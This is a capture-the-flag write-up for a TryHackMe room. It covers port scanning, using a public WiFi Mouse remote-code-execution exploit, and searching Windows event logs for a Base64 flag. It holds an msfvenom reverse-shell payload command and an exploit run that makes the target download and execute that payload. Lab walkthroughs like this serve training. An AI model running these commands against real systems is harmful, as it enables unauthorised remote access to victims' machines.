Micky Mouse Writeup

YCTF – Weekly Micky Mouse VM Challenge Writeup.

Room name: Micky Mouse

Room link: https://tryhackme.com/jr/yctfweekly

Description:

When did Micky Mouse completed it's half-century? Micky mouse event was the best event in the world 😁Can you find the flag of YCTF `event?

Hint 1: Have you tried nmap -Pn

(Direct/straight hint)

Hint 2: Micky's 50 Mouse year might help! It's the way to get inside!

(A small google search gave us 1978 as a Micky's 50)

Let's begin with the exploitation!

First we try to ping the machine, but no response, as the ICMP packets are blocked.

So, Let's scan the target using rustscan

┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.145.192
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.145.192:1978
Open 10.10.145.192:3389

We can see above, that the port 1978 and 3389 are open.

But using nmap, we got the output as host is down

┌──(root㉿kali)-[~]
└─# nmap 10.10.145.192 -vv                                                                                                                                            130 ⨯
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:16 EST
Initiating Ping Scan at 09:16
Scanning 10.10.145.192 [4 ports]
Completed Ping Scan at 09:17, 3.02s elapsed (1 total hosts)
Nmap scan report for 10.10.145.192 [host down, received no-response]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds
           Raw packets sent: 8 (304B) | Rcvd: 0 (0B)

To bypass this issue, we can try this -Pn, We get the response as host is up and port scan begins!

So, we used Nmap flags -Pn (No ping scan) -O (OS detection) -sV (Service version detection), to scan only port 1978 and 3389.

┌──(root㉿kali)-[~]
└─# nmap 10.10.145.192 -p1978,3389 -sV -O -Pn 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:33 EST
Nmap scan report for 10.10.145.192
Host is up (0.16s latency).

PORT     STATE SERVICE        VERSION
1978/tcp open  unisql?
3389/tcp open  ms-wbt-server?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1978-TCP:V=7.94%I=7%D=11/26%Time=65635732%P=x86_64-pc-linux-gnu%r(N
SF:ULL,13,"system\x20windows\x206\.1\n")%r(GenericLines,13,"system\x20wind
SF:ows\x206\.1\n")%r(GetRequest,13,"system\x20windows\x206\.1\n")%r(HTTPOp
SF:tions,13,"system\x20windows\x206\.1\n")%r(RTSPRequest,13,"system\x20win
SF:dows\x206\.1\n")%r(RPCCheck,13,"system\x20windows\x206\.1\n")%r(DNSVers
SF:ionBindReqTCP,13,"system\x20windows\x206\.1\n")%r(DNSStatusRequestTCP,1
SF:3,"system\x20windows\x206\.1\n")%r(Help,13,"system\x20windows\x206\.1\n
SF:")%r(SSLSessionReq,13,"system\x20windows\x206\.1\n")%r(TerminalServerCo
SF:okie,13,"system\x20windows\x206\.1\n")%r(TLSSessionReq,13,"system\x20wi
SF:ndows\x206\.1\n")%r(Kerberos,13,"system\x20windows\x206\.1\n")%r(SMBPro
SF:gNeg,13,"system\x20windows\x206\.1\n")%r(X11Probe,13,"system\x20windows
SF:\x206\.1\n")%r(FourOhFourRequest,13,"system\x20windows\x206\.1\n")%r(LP
SF:DString,13,"system\x20windows\x206\.1\n")%r(LDAPSearchReq,13,"system\x2
SF:0windows\x206\.1\n")%r(LDAPBindReq,13,"system\x20windows\x206\.1\n")%r(
SF:SIPOptions,13,"system\x20windows\x206\.1\n")%r(LANDesk-RC,13,"system\x2
SF:0windows\x206\.1\n")%r(TerminalServer,13,"system\x20windows\x206\.1\n")
SF:%r(NCP,13,"system\x20windows\x206\.1\n")%r(NotesRPC,13,"system\x20windo
SF:ws\x206\.1\n")%r(JavaRMI,13,"system\x20windows\x206\.1\n")%r(WMSRequest
SF:,13,"system\x20windows\x206\.1\n")%r(oracle-tns,13,"system\x20windows\x
SF:206\.1\n")%r(ms-sql-s,13,"system\x20windows\x206\.1\n")%r(afp,13,"syste
SF:m\x20windows\x206\.1\n")%r(giop,13,"system\x20windows\x206\.1\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 or Windows 8 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.61 seconds

We found out the service and OS running on the target. Then, simple search for the port 1978 unisql leads to this first exploit Wifi Mouse 1.7.8.5 - Remote Code Execution.

Download the exploit https://www.exploit-db.com/exploits/49601

Before running it, create a MSF payload by specifying LHOST and LPORT

┌──(root㉿kali)-[/]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=1234 -f exe > thmouse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Now in one tab, run the python http server

In the second tab, listen using netcat

In the third tab, run the exploit!!

python3 mouse.py <Target IP> <tun0 IP> <Payload.exe>

Holaa!! You got the shell!

Now, read the description and Question again! what does it say?

It says, Can you find the flag of YCTF `event?

It was the biggest hint, the word EVENT was repeated in the description and in the question.

Now it makes sense to look into the Windows events

Using the command wevtutil qe Application we can list all the Application events on windows.

Now scrolling just little down, we get the fake flag.

So, I copied the whole log file into my machine and searched for the Base64 strings manually. By searching for the string == we got one string

ZGlkIHlvdSBjaGVjayBldmVudCBpZCA2OSBodWg/Cg==